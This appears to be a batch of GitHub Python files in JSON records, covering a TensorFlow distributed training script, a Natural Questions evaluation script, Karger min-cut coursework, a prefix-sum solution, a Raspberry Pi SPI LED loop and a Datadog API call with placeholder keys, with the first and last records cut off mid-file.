point\n else:\n self._add_point(event)\n self._update_plot()\n # right click\n elif event.button == 3 and event.inaxes in [self._axes]:\n point = self._find_neighbor_point(event)\n if point:\n self._remove_point(*point)\n self._update_plot()\n\n def _on_release(self, event):\n u\"\"\" callback method for mouse release event\n :type event: MouseEvent\n \"\"\"\n if event.button == 1 and event.inaxes in [self._axes] and 
self._dragging_point:\n self._dragging_point = None\n self._update_plot()\n\n def _on_motion(self, event):\n u\"\"\" callback method for mouse motion event\n :type event: MouseEvent\n \"\"\"\n if not self._dragging_point:\n return\n if event.xdata is None or event.ydata is None:\n return\n self._remove_point(*self._dragging_point)\n self._dragging_point = self._add_point(event)\n self._update_plot()\n\n\nif __name__ == \"__main__\":\n plot = NDTWPlayground()\n","repo_name":"pranav-putta/ndtw_playground","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20744325698","text":"from __future__ import absolute_import\r\nfrom __future__ import division\r\nfrom __future__ import print_function\r\n\r\nimport tf_parameter_mgr\r\nimport monitor_cb\r\nfrom monitor_cb import CMonitor\r\n\r\n\r\nfrom datetime import datetime\r\nimport os.path\r\nimport time\r\nimport sys\r\nimport glob\r\nimport numpy as np\r\nimport tensorflow as tf\r\nfrom preprocessing import preprocessing_factory\r\nfrom nets import nets_factory\r\nfrom tensorflow.python.ops import variables\r\n# Choose your image preprocessing\r\ntf.app.flags.DEFINE_string('preprocessing_type', 'cifarnet', 'image processing type')\r\n# Choose the network structure\r\ntf.app.flags.DEFINE_string('network_type', 'cifarnet', 'image feature extraction network type')\r\n# Set the number of classes\r\ntf.app.flags.DEFINE_integer('number_classes', 10, 'number of classes')\r\n\r\ntf.app.flags.DEFINE_string('weights', '', 'initialize with pretrained model weights')\r\n\r\ntf.app.flags.DEFINE_string('train_dir', 'train/',\r\n \"\"\"Directory where to write event logs \"\"\"\r\n \"\"\"and checkpoint.\"\"\")\r\ntf.app.flags.DEFINE_integer('test_interval', 32, 'test_interval')\r\ntf.app.flags.DEFINE_integer('eval_topk', 1, 'accuracy of evaluation of top-k')\r\n\r\n# Parameters for distributed training, no need to modify\r\ntf.app.flags.DEFINE_string('job_name', '', 'One of \"ps\", \"worker\"')\r\ntf.app.flags.DEFINE_string('ps_hosts', '',\r\n \"\"\"Comma-separated list of hostname:port for the \"\"\"\r\n \"\"\"parameter server jobs. e.g. \"\"\"\r\n \"\"\"'machine1:2222,machine2:1111,machine2:2222'\"\"\")\r\n\r\ntf.app.flags.DEFINE_string('worker_hosts', '',\r\n \"\"\"Comma-separated list of hostname:port for the \"\"\"\r\n \"\"\"worker jobs. e.g. 
\"\"\"\r\n \"\"\"'machine1:2222,machine2:1111,machine2:2222'\"\"\")\r\n\r\ntf.app.flags.DEFINE_integer('task_id', 0, 'Task ID of the worker/replica running the training.')\r\ntf.app.flags.DEFINE_bool('log_device_placement', False, 'log_device_placement')\r\n\r\nFLAGS = tf.app.flags.FLAGS\r\nFLAGS.batch_size = tf_parameter_mgr.getTrainBatchSize()\r\n\r\ndef get_train_op(total_loss, global_step, return_grad=False):\r\n lr = tf_parameter_mgr.getLearningRate(global_step)\r\n # Compute gradients.\r\n opt = tf_parameter_mgr.getOptimizer(lr)\r\n grads = opt.compute_gradients(total_loss)\r\n # Apply gradients.\r\n apply_gradient_op = opt.apply_gradients(grads, global_step=global_step)\r\n with tf.control_dependencies([apply_gradient_op] + tf.get_collection(tf.GraphKeys.UPDATE_OPS)):\r\n train_op = tf.no_op(name='train')\r\n if return_grad:\r\n return apply_gradient_op, grads\r\n return train_op\r\n\r\ndef get_loss(logits, labels):\r\n # Calculate the average cross entropy loss across the batch.\r\n labels = tf.cast(labels, tf.int64)\r\n cross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(\r\n labels=labels, logits=logits, name='cross_entropy_per_example')\r\n cross_entropy_mean = tf.reduce_mean(cross_entropy, name='cross_entropy')\r\n tf.add_to_collection('losses', cross_entropy_mean)\r\n # The total loss is defined as the cross entropy loss plus all of the weight\r\n # decay terms (L2 loss).\r\n total_loss = tf.add_n(tf.get_collection('losses'), name='total_loss')\r\n return total_loss\r\n\r\ndef get_accuracy(logits, labels):\r\n top_k_op = tf.nn.in_top_k(logits, labels, FLAGS.eval_topk)\r\n correct = np.sum(top_k_op)\r\n accuracy = tf.reduce_mean(tf.cast(correct, tf.float32))\r\n return accuracy\r\n\r\n\r\ndef get_data(is_train=True):\r\n batch_size = FLAGS.batch_size\r\n if is_train:\r\n filenames = tf_parameter_mgr.getTrainData()\r\n else:\r\n filenames = tf_parameter_mgr.getTestData()\r\n\r\n filename_queue = tf.train.string_input_producer(filenames)\r\n\r\n reader = tf.TFRecordReader()\r\n _, serialized_example = reader.read(filename_queue)\r\n\r\n features = tf.parse_single_example(serialized_example,\r\n features={\r\n 'height': tf.FixedLenFeature([], tf.int64),\r\n 'width': tf.FixedLenFeature([], tf.int64),\r\n 'depth': tf.FixedLenFeature([], tf.int64),\r\n 'label': tf.FixedLenFeature([], tf.int64),\r\n 'image_raw': tf.FixedLenFeature([], tf.string),\r\n })\r\n label = features['label']\r\n image = tf.decode_raw(features['image_raw'], tf.uint8)\r\n height = tf.cast(features['height'], tf.int32)\r\n width = tf.cast(features['width'], tf.int32)\r\n depth = tf.cast(features['depth'], tf.int32)\r\n image = tf.reshape(image, tf.stack([height, width, depth]))\r\n\r\n preprocessing_type = FLAGS.preprocessing_type\r\n preprocessor = preprocessing_factory.get_preprocessing(preprocessing_type, is_training=is_train)\r\n network_type = FLAGS.network_type\r\n default_size = nets_factory.get_default_size(network_type)\r\n image = preprocessor(image, output_height=default_size, output_width=default_size)\r\n image.set_shape([default_size, default_size, 3])\r\n\r\n image_batch, label_batch = tf.train.batch([image, label], batch_size=batch_size, num_threads=4, capacity=32)\r\n return image_batch, label_batch\r\n\r\n\r\ndef train():\r\n ps_hosts = FLAGS.ps_hosts.split(',')\r\n worker_hosts = FLAGS.worker_hosts.split(',')\r\n print('Ps hosts are: %s' % ps_hosts)\r\n print('Worker hosts are: %s' % worker_hosts)\r\n\r\n cluster = tf.train.ClusterSpec({\"ps\": ps_hosts, \"worker\": 
worker_hosts})\r\n\r\n server = tf.train.Server(\r\n cluster,\r\n job_name=FLAGS.job_name,\r\n task_index=FLAGS.task_id)\r\n\r\n if FLAGS.job_name == 'ps':\r\n server.join()\r\n\r\n is_chief = (FLAGS.task_id == 0)\r\n\r\n with tf.device(tf.train.replica_device_setter(\r\n worker_device=\"/job:worker/task:%d\" % FLAGS.task_id,\r\n cluster=cluster)):\r\n global_step = tf.contrib.framework.get_or_create_global_step()\r\n is_training = tf.placeholder_with_default(False, shape=[])\r\n i_train, l_train = get_data(is_train=True)\r\n i_test, l_test = get_data(is_train=False)\r\n images, labels = tf.cond(is_training, lambda: (i_train, l_train), lambda: (i_test, l_test))\r\n network_type = FLAGS.network_type\r\n embedding_network = nets_factory.get_network_fn(network_type, num_classes=FLAGS.number_classes,\r\n is_training=is_training)\r\n logits, end_points = embedding_network(images)\r\n total_loss = get_loss(logits, labels)\r\n accuracy = get_accuracy(logits, labels)\r\n train_op = get_train_op(total_loss, global_step)\r\n # setup MAO and Tensorboard monitoring\r\n print('FLAGS.train_dir', FLAGS.train_dir)\r\n log_dir = os.path.join(FLAGS.train_dir, 'log')\r\n # graph = tf.get_default_graph()\r\n monitor = CMonitor(log_dir, tf_parameter_mgr.getTestInterval(), tf_parameter_mgr.getMaxSteps())\r\n monitor.SummaryScalar('train accuracy', accuracy)\r\n monitor.SummaryScalar('test accuracy', accuracy)\r\n \r\n monitor.SummaryScalar('train loss', total_loss)\r\n monitor.SummaryScalar('test loss', total_loss)\r\n\r\n # if is_chief:\r\n # graph = tf.get_default_graph()\r\n # all_ops = graph.get_operations()\r\n # for op in all_ops:\r\n # if op.type == 'VariableV2':\r\n # output_tensor = graph.get_tensor_by_name(op.name + ':0')\r\n # if op.name.endswith('/weights'):\r\n # monitor.SummaryHist(\"weight\", output_tensor, op.name.replace('/',''))\r\n # monitor.SummaryNorm2(\"weight\", output_tensor, op.name.replace('/',''))\r\n # elif op.name.endswith('/biases'):\r\n # monitor.SummaryHist(\"bias\", output_tensor, op.name.replace('/',''))\r\n # elif op.type == 'Relu':\r\n # output_tensor = graph.get_tensor_by_name(op.name + ':0')\r\n # monitor.SummaryHist(\"activation\", output_tensor, op.name.replace('/',''))\r\n # monitor.SummaryGradient('weight', total_loss)\r\n # monitor.SummaryGradient('bias', total_loss)\r\n # monitor.SummaryGWRatio()\r\n\r\n train_summary = tf.summary.merge_all(monitor_cb.DLMAO_TRAIN_SUMMARIES)\r\n test_summary = tf.summary.merge_all(monitor_cb.DLMAO_TEST_SUMMARIES)\r\n summaryWriter = tf.summary.FileWriter(log_dir)\r\n\r\n class _LoggerHook(tf.train.SessionRunHook):\r\n def begin(self):\r\n self._next_trigger_step = FLAGS.test_interval\r\n self._trigger = True\r\n\r\n def before_run(self, run_context):\r\n args = {'global_step': global_step}\r\n if self._trigger:\r\n args['train_summary'] = train_summary\r\n\r\n return tf.train.SessionRunArgs(args)\r\n\r\n def after_run(self, run_context, run_values):\r\n gs = run_values.results['global_step']\r\n if self._trigger:\r\n self._trigger = False\r\n summaryWriter.add_summary(run_values.results['train_summary'], gs)\r\n summary = run_context.session.run(test_summary, feed_dict={is_training: False})\r\n summaryWriter.add_summary(summary, gs)\r\n summaryWriter.flush()\r\n if gs >= self._next_trigger_step:\r\n self._next_trigger_step += FLAGS.test_interval\r\n self._trigger = True\r\n\r\n\r\n hooks = [tf.train.StopAtStepHook(last_step=tf_parameter_mgr.getMaxSteps()),\r\n tf.train.NanTensorHook(total_loss)]\r\n\r\n if is_chief:\r\n 
hooks.append(_LoggerHook())\r\n\r\n pretrained_model = FLAGS.weights\r\n variables_saved = variables._all_saveable_objects()\r\n print(\"Variables stored in the model:\")\r\n variables_to_restore = []\r\n for var in variables_saved:\r\n if var.op.name.startswith('global_step') or var.op.name.startswith('InceptionV3/Logits'):\r\n print('remove', var.op.name, var.op)\r\n continue\r\n else:\r\n variables_to_restore.append(var)\r\n\r\n print(\"------------------------------\")\r\n print('will restore ', variables_to_restore)\r\n saver = tf.train.Saver(var_list=variables_to_restore)\r\n\r\n with tf.train.MonitoredTrainingSession(master=server.target, is_chief=is_chief, checkpoint_dir=FLAGS.train_dir, hooks=hooks,\r\n config=tf.ConfigProto(log_device_placement=FLAGS.log_device_placement), save_summaries_steps=None, save_summaries_secs=None) as mon_sess:\r\n if pretrained_model != None:\r\n ckpt = tf.train.get_checkpoint_state(pretrained_model)\r\n print(\"Restore pre-trained checkpoint:\", ckpt)\r\n if ckpt and ckpt.model_checkpoint_path:\r\n saver.restore(mon_sess, ckpt.model_checkpoint_path)\r\n print(\"Successfully restore checkpoint:\", ckpt.model_checkpoint_path)\r\n else:\r\n files = os.listdir(pretrained_model)\r\n for f in files:\r\n if f.endswith('ckpt'):\r\n model_checkpoint_path = pretrained_model+\"/\"+f\r\n try:\r\n saver.restore(mon_sess, model_checkpoint_path)\r\n print(\"Successfully restore checkpoint:\", model_checkpoint_path)\r\n except Exception as e:\r\n print(\"Fail to restore \",model_checkpoint_path,'with message',e)\r\n break\r\n steps = 0\r\n\r\n while not mon_sess.should_stop():\r\n mon_sess.run(train_op, feed_dict={is_training: True})\r\n steps += 1\r\n if steps % 100 == 0: print('%d stpes executed on worker %d.' % (steps, FLAGS.task_id))\r\n print('%d stpes executed on worker %d.' % (steps, FLAGS.task_id))\r\n\r\ndef main(argv=None):\r\n train()\r\n\r\nif __name__ == '__main__':\r\n tf.app.run()\r\n","repo_name":"apollos/mytoolkits","sub_path":"models/GuidelineOfTensorflowModel/classification_src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":11968,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"39269430263","text":"r\"\"\"Official evaluation script for Natural Questions.\n\n https://ai.google.com/research/NaturalQuestions\n\n ------------------------------------------------------------------------------\n\n Example usage:\n\n nq_eval --gold_path=<path-to-gold-files> --predictions_path=<path_to_json>\n\n This will compute both the official F1 scores as well as recall@precision\n tables for both long and short answers. Note that R@P are only meaningful\n if your model populates the score fields of the prediction JSON format.\n\n gold_path should point to the five way annotated dev data in the\n original download format (gzipped jsonlines).\n\n predictions_path should point to a json file containing the predictions in\n the format given below.\n\n ------------------------------------------------------------------------------\n\n Prediction format:\n\n {'predictions': [\n {\n 'example_id': -2226525965842375672,\n 'long_answer': {\n 'start_byte': 62657, 'end_byte': 64776,\n 'start_token': 391, 'end_token': 604\n },\n 'long_answer_score': 13.5,\n 'short_answers': [\n {'start_byte': 64206, 'end_byte': 64280,\n 'start_token': 555, 'end_token': 560}, ...],\n 'short_answers_score': 26.4,\n 'yes_no_answer': 'NONE'\n }, ... 
]\n }\n\n The prediction format mirrors the annotation format in defining each long or\n short answer span both in terms of byte offsets and token offsets. We do not\n expect participants to supply both.\n\n The order of preference is:\n\n if start_byte >= 0 and end_byte >=0, use byte offsets,\n else if start_token >= 0 and end_token >= 0, use token offsets,\n else no span is defined (null answer).\n\n The short answer metric takes both short answer spans, and the yes/no answer\n into account. If the 'short_answers' list contains any non/null spans, then\n 'yes_no_answer' should be set to 'NONE'.\n\n -----------------------------------------------------------------------------\n\n Metrics:\n\n If >= 2 of the annotators marked a non-null long answer, then the prediction\n must match any one of the non-null long answers to be considered correct.\n\n If >= 2 of the annotators marked a non-null set of short answers, or a yes/no\n answer, then the short answers prediction must match any one of the non-null\n sets of short answers *or* the yes/no prediction must match one of the\n non-null yes/no answer labels.\n\n All span comparisons are exact and each individual prediction can be fully\n correct, or incorrect.\n\n Each prediction should be provided with a long answer score, and a short\n answers score. At evaluation time, the evaluation script will find a score\n threshold at which F1 is maximized. All predictions with scores below this\n threshold are ignored (assumed to be null). If the score is not provided,\n the evaluation script considers all predictions to be valid. The script\n will also output the maximum recall at precision points of >= 0.5, >= 0.75,\n and >= 0.9.\n\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom interval import Interval, IntervalSet\nfrom collections import OrderedDict\nimport json\nimport os\nimport pickle\nfrom absl import app\nfrom absl import flags\nfrom absl import logging\nimport eval_utils as util\n\nflags.DEFINE_string(\n 'gold_path', 'sample/gold.gz', 'Path to the gzip JSON data. For '\n 'multiple files, should be a glob '\n 'pattern (e.g. \"/path/to/files-*\"')\nflags.DEFINE_string('predictions_path', 'sample/pred.json', 'Path to prediction JSON.')\nflags.DEFINE_bool(\n 'cache_gold_data', False,\n 'Whether to cache gold data in Pickle format to speed up '\n 'multiple evaluations.')\nflags.DEFINE_integer('num_threads', 10, 'Number of threads for reading.')\n#flags.DEFINE_bool('pretty_print', True, 'Whether to pretty print output.')\nflags.DEFINE_bool('optimal_threshold', False, 'Whether to adjust threshold');\n\nFLAGS = flags.FLAGS\n\n\ndef safe_divide(x, y):\n \"\"\"Compute x / y, but return 0 if y is zero.\"\"\"\n if y == 0:\n return 0\n else:\n return x / y\n\ndef score_short_answer(gold_label_list, pred_label, threshold = 0):\n \"\"\"Scores a short answer as correct or not.\n\n 1) First decide if there is a gold short answer with SHORT_NO_NULL_THRESHOLD.\n 2) The prediction will get a F1 if:\n a. There is a gold short answer.\n b. 
The prediction span *set* match exactly with *one* of the non-null gold\n short answer span *set*.\n\n Args:\n gold_label_list: A list of NQLabel.\n pred_label: A single NQLabel.\n\n Returns:\n gold_has_answer, pred_has_answer, f1, score\n \"\"\"\n #print(gold_label_list)\n #print(pred_label)\n # There is a gold short answer if gold_label_list not empty and non null\n # answers is over the threshold (sum over annotators).\n gold_has_answer = util.gold_has_short_answer(gold_label_list)\n\n # There is a pred long answer if pred_label is not empty and short answer\n # set is not empty.\n\n pred_has_answer = pred_label and (\n (not util.is_null_span_list(pred_label.short_answer_span_list, pred_label.short_score_list, threshold)) or\n pred_label.yes_no_answer != 'none')\n\n f1 = 0\n p = 0\n r = 0\n # score = pred_label.short_score\n\n # Both sides have short answers, which contains yes/no questions.\n if gold_has_answer and pred_has_answer:\n if pred_label.yes_no_answer != 'none': # System thinks its y/n questions.\n for gold_label in gold_label_list:\n if pred_label.yes_no_answer == gold_label.yes_no_answer:\n f1 = 1\n p = 1\n r = 1\n break\n else:\n # 抽取式答案比对\n for gold_label in gold_label_list:\n gold_set = []\n pred_set = []\n for span, score in zip(pred_label.short_answer_span_list, pred_label.short_score_list):\n if score >= threshold:\n pred_set += [(span.start_token_idx, span.end_token_idx)]\n for span in gold_label.short_answer_span_list:\n gold_set += [(span.start_token_idx, span.end_token_idx)]\n\n # 这里对gold_Set 进行处理\n\n #print(gold_set)\n\n def concat_gold_set(gold_set):\n \n def takeFirst(elem):\n return elem[0]\n gold_set.sort(key=takeFirst)\n\n new_set = []\n current_start = gold_set[0][0]\n current_end = gold_set[0][1]\n for i in range(1,len(gold_set)):\n start = gold_set[i][0]\n end = gold_set[i][1]\n if(start-current_end>5):\n new_set.append([current_start,current_end])\n current_end = end\n current_start = start\n else:\n current_end = end\n \n new_set.append([current_start,current_end])\n return new_set\n\n gold_set = concat_gold_set(gold_set)\n #print(pred_set)\n #print(gold_set)\n #print(\"-------------------------------------------\")\n def count_same(span_list, interval_set):\n sum = 0\n for span in span_list:\n for interval in interval_set:\n if span[0] == interval[0] and span[1] == interval[1]:\n sum += 1\n break\n return sum\n correct_interval = count_same(pred_set, gold_set)\n precision = safe_divide(correct_interval, len(pred_set))\n recall = safe_divide(correct_interval, len(gold_set))\n\n if safe_divide(2 * precision * recall, precision + recall) > f1:\n f1 = safe_divide(2 * precision * recall, precision + recall)\n p = precision\n r = recall\n elif not gold_has_answer and not pred_has_answer:\n f1 = 1\n p = 1\n r = 1\n\n return gold_has_answer, pred_has_answer, f1, p, r\n\ndef get_f1(gold_annotation_dict, pred_dict):\n gold_id_set = set(gold_annotation_dict.keys())\n pred_id_set = set(pred_dict.keys())\n\n if gold_id_set.symmetric_difference(pred_id_set):\n #print(\"gold_id_set\", gold_id_set)\n #print(\"pred_id_set\", pred_id_set)\n raise ValueError('ERROR: the example ids in gold annotations and example '\n 'ids in the prediction are not equal.')\n\n final_f1 = 0\n final_p = 0\n final_r = 0\n if FLAGS.optimal_threshold == True:\n score_list = []\n for example_id in gold_id_set:\n gold = gold_annotation_dict[example_id]\n pred = pred_dict[example_id]\n for score in pred.short_score_list:\n score_list += [score]\n\n score_list += [0]\n score_list.sort()\n 
#print('score_list', score_list)\n for threshold in score_list:\n sum_f1 = 0\n sum_p = 0\n sum_r = 0\n for example_id in gold_id_set:\n gold = gold_annotation_dict[example_id]\n pred = pred_dict[example_id]\n #print(pred)\n #print(gold)\n gold_has_answer, pred_has_answer, f1, p, r = score_short_answer(gold, pred, threshold)\n # print('threshold, f1, gold_has_answer, pred_has_answer', \\\n # threshold, f1, gold_has_answer, pred_has_answer)\n sum_f1 += f1\n sum_p += p\n sum_r += r\n # print('threshold, f1, p, r', \\\n # threshold, safe_divide(sum_f1, len(gold_id_set)), safe_divide(sum_p, len(gold_id_set)), safe_divide(sum_r, len(gold_id_set)))\n if safe_divide(sum_f1, len(gold_id_set)) > final_f1:\n final_f1 = safe_divide(sum_f1, len(gold_id_set))\n final_p = safe_divide(sum_p, len(gold_id_set))\n final_r = safe_divide(sum_r, len(gold_id_set))\n else:\n # 标准模式\n sum_f1 = 0\n sum_p = 0\n sum_r = 0\n for example_id in gold_id_set:\n gold = gold_annotation_dict[example_id]\n pred = pred_dict[example_id]\n gold_has_answer, pred_has_answer, f1, p, r = score_short_answer(gold, pred)\n sum_f1 += f1\n sum_p += p\n sum_r += r\n final_f1 = safe_divide(sum_f1, len(gold_id_set))\n final_p = safe_divide(sum_p, len(gold_id_set))\n final_r = safe_divide(sum_r, len(gold_id_set))\n print(len(gold_id_set))\n\n #final f1\n #final_f1 = 2*safe_divide(final_p*final_r,final_p+final_r)\n return final_f1, final_p, final_r\n\n\ndef main(_):\n cache_path = os.path.join(os.path.dirname(FLAGS.gold_path), 'cache')\n if FLAGS.cache_gold_data and os.path.exists(cache_path):\n logging.info('Reading from cache: %s', format(cache_path))\n nq_gold_dict = pickle.load(open(cache_path, 'r'))\n else:\n nq_gold_dict = util.read_annotation(\n FLAGS.gold_path, n_threads=FLAGS.num_threads)\n if FLAGS.cache_gold_data:\n logging.info('Caching gold data for next time to: %s', format(cache_path))\n pickle.dump(nq_gold_dict, open(cache_path, 'w'))\n\n nq_pred_dict = util.read_prediction_json(FLAGS.predictions_path)\n\n ## input: nq_gold_dict, nq_pred_dict\n ## output: long, short score (with optional optimal threshold)\n\n print('final f1, final_p, final_r', get_f1(nq_gold_dict, nq_pred_dict))\n\nif __name__ == '__main__':\n # flags.mark_flag_as_required('gold_path')\n # flags.mark_flag_as_required('predictions_path')\n app.run(main)\n","repo_name":"zzhao1998/nq_model","sub_path":"bert_joint/nq_eval_new.py","file_name":"nq_eval_new.py","file_ext":"py","file_size_in_byte":10972,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"3"} +{"seq_id":"7147532391","text":"'''\nCoursera - Algorithms Specialization, Stanford - Programming Assignment - Course 1 Week 2\nSerena Rosignoli, 2023\n\nThe file contains the adjacency list representation of a simple undirected graph.\nThere are 200 vertices labeled 1 to 200.\nThe first column in the file represents the vertex label, and the particular row (other entries except the first column) tells all the vertices that the vertex is adjacent to.\nSo for example, the 6th6th row looks like : \"6\t155\t56\t52\t120\t......\". This just means that the vertex with label 6 is adjacent to (i.e., shares an edge with) the vertices with labels 155,56,52,120,......,etc\n\nYour task is to code up and run the randomized contraction algorithm for the min cut problem and use it on the above graph to compute the min cut. (HINT: Note that you'll have to figure out an implementation of edge contractions. 
Initially, you might want to do this naively, creating a new graph from the old every time there's an edge contraction. But you should also think about more efficient implementations.) (WARNING: As per the video lectures, please make sure to run the algorithm many times with different random seeds, and remember the smallest cut that you ever find.) Write your numeric answer in the space provided. So e.g., if your answer is 5, just type 5 in the space provided.\n'''\n\n\nimport math\nimport random\n\nclass UndirectedGraph:\n\n def __init__(self, vertices):\n self.adj_vertices = []\n while vertices > 0:\n self.adj_vertices.append([])\n vertices -= 1\n\n\n def copy(self):\n res = UndirectedGraph(0)\n for l in self.adj_vertices:\n res.adj_vertices.append(l[:])\n return res\n\n\n def add_edge(self, i, j):\n # Assuming there will be a\n # call of self.add_edge(j, i)\n self.adj_vertices[i].append(j)\n\n def n(self):\n return len(self.adj_vertices)\n\n\n def merge_karger(self, i, j):\n\n i_adj = self.adj_vertices[i]\n k = 0\n while k < len(i_adj):\n if i_adj[k] == j:\n i_adj.pop(k)\n k -= 1\n k += 1\n\n for v in self.adj_vertices[j]:\n if (v != i):\n self.add_edge(i, v)\n v_adj = self.adj_vertices[v]\n # Assuming undirected graph\n k = 0\n l = len(v_adj)\n while k < l:\n if(v_adj[k] == j):\n v_adj[k] = i\n break\n k += 1\n\n # Optimization: instead of computing a new graph\n # just swap j-th and (n-1)-th lines 'in-place'\n self.adj_vertices[j] = self.adj_vertices[self.n()-1]\n for v in self.adj_vertices[j]:\n v_adj = self.adj_vertices[v]\n # Assuming undirected graph\n k = 0\n l = len(v_adj)\n while k < l:\n if(v_adj[k] == (self.n()-1)):\n v_adj[k] = j\n break\n k += 1\n self.adj_vertices.pop()\n\n\n\ndef _kargerMinCut(graph, seed):\n\n # Each time - new seed\n random.seed(seed)\n\n while graph.n() > 2:\n # Picking random edge\n i = random.randint(0, graph.n()-1)\n adj = graph.adj_vertices[i]\n j = random.choice(adj)\n\n graph.merge_karger(i, j)\n\n # Two vertices remain\n return len(graph.adj_vertices[0])\n\n\ndef kargerMinCut(graph, N):\n '''\n Computes the minimum cut of the graph.\n\n Running time lower bound is Omega(N * m), where\n N - number of iterations,\n m - number of graph edges.\n\n For high success probability (1/n failure chance),\n use N = n^2 * log(n).\n '''\n\n i = 0\n\n # (!) Working with the copy of the graph,\n # not destroying the original one\n min_res = _kargerMinCut(graph.copy(), i)\n while i < N:\n t = _kargerMinCut(graph.copy(), i)\n print(str(i)+': '+str(t))\n if t < min_res: min_res = t\n i += 1\n\n return min_res\n\n\ndef main():\n\n f = open('kargerMinCut.txt')\n # (!) 
Even better approach to reading line than in PA2\n lines = f.read().splitlines()\n f.close()\n\n graph = UndirectedGraph(200)\n\n for line in lines:\n lst = line.split('\\t')\n t = int(lst[0])-1\n for i in lst[1:-1]:\n v = int(i)-1\n graph.add_edge(t, v)\n\n # To get (1/n) failure probability,\n # repeat the basic procedure n^2 * log(n) times\n\n N = math.log(graph.n()) #graph.n()**2 * math.log(graph.n())\n print(N)\n for i in range(5):\n print(kargerMinCut(graph, i))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"SerenaRosi/AlgorithmsSpecializationStanford","sub_path":"Course1/kargermincut.py","file_name":"kargermincut.py","file_ext":"py","file_size_in_byte":4614,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"69873608082","text":"import sys\nN, M = map(int, sys.stdin.readline().strip().split())\narr = [list(map(int, sys.stdin.readline().strip().split())) for _ in range(N)]\nsum_arr = [[0]*(N+1) for _ in range(N+1)]\n\n# 누적합 구하기\nfor i in range(1, N+1):\n for j in range(1, N+1):\n sum_arr[i][j] = arr[i-1][j-1] + sum_arr[i-1][j] + sum_arr[i][j-1] - sum_arr[i-1][j-1]\n\n# print(sum_arr)\n# 부분합 구하기\nfor _ in range(M):\n x1, y1, x2, y2 = map(int, sys.stdin.readline().strip().split())\n x1 -= 1\n x2 -= 1\n y1 -= 1\n y2 -= 1\n print(sum_arr[x2+1][y2+1] - sum_arr[x2+1][y1] - sum_arr[x1][y2+1] + sum_arr[x1][y1])","repo_name":"auddus16/Algorithm_python","sub_path":"구간합/11660_구간합구하기5.py","file_name":"11660_구간합구하기5.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29846979121","text":"import spidev\nimport time\n\nBUS = 0\nDEVICE = 1\n\nPORT = 1 # PORTB\nLED = 5\nMAX_STEPS = 15\n\nspi = spidev.SpiDev()\nspi.open(BUS, DEVICE)\nspi.max_speed_hz = 100000\n\ndelay = 1\nmodif = 1\nwhile True:\n if delay >= MAX_STEPS:\n modif = -1\n elif delay <= 1:\n modif = 1\n\n spi.xfer([PORT, 1 << LED, 0xFF])\n time.sleep(1.0 / delay)\n spi.xfer([PORT, 1 << LED, 0x00])\n time.sleep(1.0 / delay)\n print(1.0 / delay)\n\n delay += 1 * modif\n","repo_name":"trnila/rpi_ctrl","sub_path":"spi.py","file_name":"spi.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"39701164664","text":"from datadog import initialize, api\n\noptions = {\n 'api_key': '<DATADOG_API_KEY>',\n 'app_key': '<DATADOG_APPLICATION_KEY>'\n}\n\ninitialize(**options)\n\napi.AzureIntegration.update_host_filters(\n tenant_name=\"<AZURE_TENANT_NAME>\",\n host_filters=\"new:filters\",\n client_id=\"<AZURE_CLIENT_ID>\"\n)\n","repo_name":"DataDog/documentation","sub_path":"content/en/api/v1/azure-integration/UpdateAzureHostFilters.py","file_name":"UpdateAzureHostFilters.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","stars":312,"dataset":"github-code","pt":"3"} +{"seq_id":"15917171734","text":"\"\"\"\n给定一个链表, **返回链表开始入环的第一个节点**, 若链表无环,则返回`None`\n\n**说明**\n* 不允许修改链表\n* 使用$O(1)$的空间\n\n**注意**\n这个和`hasCycle`相比,更近一步:返回环的第一个节点, 而不是Bool 值\n\"\"\"\n\n\nclass ListNode:\n\n def __init__(self, value):\n self.value = value\n self.next = None\n\n def __repr__(self):\n return f\"List Node with value: {self.value}\"\n\n\ndef detectCycle(node):\n fast = node\n slow = node\n\n while True:\n if not (fast and fast.next):\n return\n fast = fast.next.next\n slow = slow.next\n # fast and slow meet the first time\n # fast reset, and slow continue in the cycle\n 
if fast == slow:\n break\n # reset fast to the head\n fast = head\n # both in the cycle, if they meet, fast will be the entry of the cycle\n while fast != slow:\n fast = fast.next\n slow = slow.next\n\n return fast\n\n\nif __name__ == '__main__':\n head = ListNode(5)\n node3 = ListNode(3)\n node2 = ListNode(2)\n node7 = ListNode(7)\n node1 = ListNode(1)\n node6 = ListNode(6)\n node8 = ListNode(8)\n node9 = ListNode(9)\n node4 = ListNode(4)\n\n head.next = node3\n node3.next = node2\n node2.next = node7\n node7.next = node1\n node1.next = node6\n node6.next = node8\n node8.next = node9\n node9.next = node4\n node4.next = node1\n\n print(detectCycle(node=head))\n\n head2 = ListNode(-1)\n print(detectCycle(node=head2))\n","repo_name":"JL1829/LeetCode","sub_path":"src/detectCycle.py","file_name":"detectCycle.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42309557966","text":"\n# Tests in Python for some scripttestlib features that are difficult to test in\n# test_scripttestlib.py\n\n\n_defs = {\n 'empty_output': {\n 'stdout': '',\n 'stderr': '',\n 'returncode': 0,\n },\n}\n\ntestcases = [\n {\n 'name': 'scripttestlib: Reference a reusable definition in Python',\n 'input': {\n 'cmdline': 'cat /dev/null',\n },\n 'output': _defs['empty_output'],\n 